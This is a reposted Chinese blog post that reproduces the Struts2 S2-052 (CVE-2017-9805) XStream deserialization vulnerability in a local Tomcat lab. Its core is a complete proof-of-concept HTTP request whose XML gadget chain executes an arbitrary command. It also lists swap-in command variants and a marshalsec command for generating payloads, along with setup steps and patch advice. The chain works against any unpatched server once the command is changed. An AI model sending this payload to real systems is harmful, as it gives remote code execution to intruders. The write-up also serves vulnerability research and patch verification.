(转) struts2-052漏洞

  • 2017-09-06
  • 141
  • 0

原文链接 nMask

概述

今年struts2疯了,被爆出了很多高危漏洞,之前我研究过s_045、s_046漏洞,近期又出现了s_052漏洞。s_052漏洞危害稍微小一些,因为利用环境比较苛刻,需要使用Struts2 REST插件的XStream组件。

免责申明:文章中的工具等仅供个人测试研究,请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负

s2-052漏洞介绍

s2-052漏洞是当用户使用带有XStream组件的Struts-REST插件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,可直接在数据包中插入恶意代码。

漏洞编号:CVE-2017-9805(S2-052)
漏洞影响:Struts2.5 – Struts2.5.12版本。

S2-052poc

POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2365
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

注意:执行命令的地方在于command内,这里是针对mac下的弹出计算器,如果是windows可改成calc.exe

<command>
<string>
/Applications/Calculator.app/Contents/MacOS/Calculator
</string>
</command>

s2-052漏洞复现

mac install tomcat

在安装tomcat前,先检测一下mac上有没有安装java,可以运行java -version。

java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)

前往tomcat官网下载:http://tomcat.apache.org/download-80.cgi?from_33lc.com 选择下载Core下的tar.gz包到本地,然后解压。
将解压后到文件夹移动到/Library目录下,并命名为Tomcat;然后设置权限:

sudo chmod 755 /Library/Tomcat/bin/*.sh

进入/Library/Tomcat/bin/目录,运行启动tomcat

sudo sh startup.sh

访问:http://127.0.0.1:8080
注意:若要修改tomcat端口,可打开/Library/Tomcat/conf/server.xml文件,修改8080端口。

编写启动关闭tomcat脚本:
将以下内容写入tomcat文件中(自己创建)

#!/bin/bash
case $1 in
start)
sh /Library/Tomcat/bin/startup.sh
;;
stop)
sh /Library/Tomcat/bin/shutdown.sh
;;
restart)
sh /Library/Tomcat/bin/shutdown.sh
sh /Library/Tomcat/bin/startup.sh
;;
*)
echo “Usage: start|stop|restart”
;;
esac
exit 0

赋予文件权限:

chmod 777 tomcat

添加环境变量:

export PATH="$PATH:/Library/Tomcat/bin"

然后运行启动关闭tomcat:

sudo tomcat start
sudo tomcat stop

注:linux、windows安装tomcat方法都与之类似,这里不再演示。

下载部署存在漏洞的struts2版本

从struts2的官网下载最后受影响的版本struts-2.5.12解压后,将apps目录下的struts2-rest-showcase.war文件放到webapps目录下(/Library/Tomcat/webapps)重启tomcat后访问:http://127.0.0.1:8080/struts2-rest-showcase/

resume

由于burpsuite监控的端口也是8080,所以我将tomcat的端口改成8081了。

构造post包

可以直接使用上面的poc发包,也可以自己抓取数据包重放,自己抓取的方式是点击页面上的编辑,然后点击submit提交,抓取post包,再修改post的body字段为此漏洞的poc。

尝试不同的poc

网上使用最多的poc是弹出一个计算器,然而我在mac上测试发现弹出计算器失败了,因此换了一个写文件的poc,发现测试成功。

写文件poc:(会在/tmp/下生成vuln文件)

<command><string>/usr/bin/touch</string><string>/tmp/vuln</string> </command>

弹计算器poc

Mac:
<command><string>/Applications/Calculator.app/Contents/MacOS/Calculator</string></command>
windows:
<command><string>clac.exe</string></command>

poc生成

java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO calc.exe > poc.txt

marshalsec-0.0.1-SNAPSHOT-all.jar网上可以下载,这里不给出地址了,自行搜索。

修补方法

  • 升级Struts到2.5.13最新版本。
  • 在不使用时删除Struts REST插件,或仅限于服务器普通页面和JSONs

python验证脚本

https://github.com/ReZeroS/Security/blob/master/S2-052Check.py

评论

还没有任何评论,你来说两句吧